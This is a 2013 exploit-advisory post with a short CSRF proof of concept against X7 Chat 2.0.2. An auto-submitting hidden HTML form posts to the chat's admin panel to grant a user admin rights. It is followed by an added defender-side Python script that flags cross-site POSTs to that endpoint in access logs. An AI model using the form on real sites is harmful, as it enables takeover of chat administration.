Saturday, 14 December 2013

X7 CHAT 2.0.2 CSRF (add admin) vulnerability

[+] Author: TUNISIAN CYBER
[+] Exploit Title: X7 CHAT 2.0.2 CSRF Add Admin Vulnerability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor: http://www.x7chat.com/
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7, Ubuntu 13.04
  
  
########################################################################################
<html>
    <body onload="document.xform.submit();">
        <form name="xform" action="site.ltd/chat/index.php?act=adminpanel&cp_page=users&update=USER" method="post">
            <input type="hidden" name="username" value="USER" />
            <input type="hidden" name="usergroup" value="PASSWORD" />
        </form>
    </body>
</html>
 
Change USERNAME and PASSWORD
 
Demo:
########################################################################################
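
A defender-side check for the request the PoC above generates, added here as an example and not part of the original advisory: it scans web-server access logs for POSTs to the act=adminpanel endpoint whose Referer is missing or names another host. The combined log format, the sample lines and the host chat.example.test are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in "combined" format; all hosts are placeholders.
SAMPLE_LOG = '''\
198.51.100.7 - - [13/Dec/2013:10:00:01 +0000] "POST /chat/index.php?act=adminpanel&cp_page=users&update=alice HTTP/1.1" 200 512 "http://chat.example.test/chat/index.php?act=adminpanel&cp_page=users" "Mozilla/5.0"
198.51.100.7 - - [13/Dec/2013:10:05:44 +0000] "POST /chat/index.php?act=adminpanel&cp_page=users&update=mallory HTTP/1.1" 200 498 "http://other.example.net/page.html" "Mozilla/5.0"
198.51.100.7 - - [13/Dec/2013:10:06:10 +0000] "POST /chat/index.php?act=adminpanel&cp_page=users&update=bob HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Dec/2013:10:07:00 +0000] "GET /chat/index.php HTTP/1.1" 200 2048 "http://other.example.net/page.html" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)


def classify(line, site_host):
    """Return a finding for POSTs to the admin panel, or None for other lines."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if query.get("act") != ["adminpanel"]:
        return None
    # The victim's browser sets Referer on an auto-submitted form, so a foreign
    # host here means the admin request was driven from another site.
    ref_host = urlsplit(m["referer"]).hostname  # None for "-" or an empty value
    if ref_host is None:
        verdict = "no-referer"      # Referer suppressed: review manually
    elif ref_host == site_host.lower():
        verdict = "same-origin"
    else:
        verdict = "cross-site"
    return {"ip": m["ip"], "time": m["ts"], "verdict": verdict, "referer": m["referer"],
            "cp_page": query.get("cp_page", [""])[0], "update": query.get("update", [""])[0]}


def suspicious(log_text, site_host):
    """Findings whose Referer is missing or names a host other than site_host."""
    findings = (classify(line, site_host) for line in log_text.splitlines())
    return [f for f in findings if f and f["verdict"] != "same-origin"]


if __name__ == "__main__":
    for f in suspicious(SAMPLE_LOG, "chat.example.test"):
        print(f["time"], f["ip"], f["verdict"], f["cp_page"], f["update"], f["referer"])
```

Referer matching is a triage heuristic for logs; it does not replace a per-session anti-CSRF token on the admin forms.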
